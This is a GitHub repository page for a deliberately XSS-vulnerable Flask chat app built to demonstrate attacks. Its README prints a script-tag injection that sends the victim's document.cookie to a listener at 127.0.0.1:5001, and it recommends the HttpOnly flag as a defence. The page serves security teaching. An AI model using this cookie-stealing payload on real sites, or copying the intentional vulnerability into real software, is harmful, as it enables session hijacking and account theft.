Skip to content
/ xss-vulnerable-chat-webapp Public

XSS vulnerable chat web app created with Flask and socket programming.

License

MIT license
2 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

50Fifty/xss-vulnerable-chat-webapp

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

28 Commits
models
models
 
 
templates
templates
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
attacker.py
attacker.py
 
 
readme.md
readme.md
 
 
requirements.txt
requirements.txt
 
 
server.py
server.py
 
 

Repository files navigation

Vulnerable Chat WebApp with Flask

Building an vulnerable chat web app with Flask, socket programming to demostrate XSS attacks.

Attacker's injection: <script>$.ajax({ url : 'http://127.0.0.1:5001/listen', type : 'POST', data : { 'cookie' : document.cookie }, success : function(response) {}, error : function(error) {} })</script>

A good way to prevent XSS attacks on cookies is to set the HttpOnly flag of the cookie. This makes the cookie unavailable to scripting languages like JavaScript.

Give me a star if this has helped you in any way!

About

XSS vulnerable chat web app created with Flask and socket programming.

Topics

flask cookie socket-io chat-application

Resources

Readme

License

MIT license
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages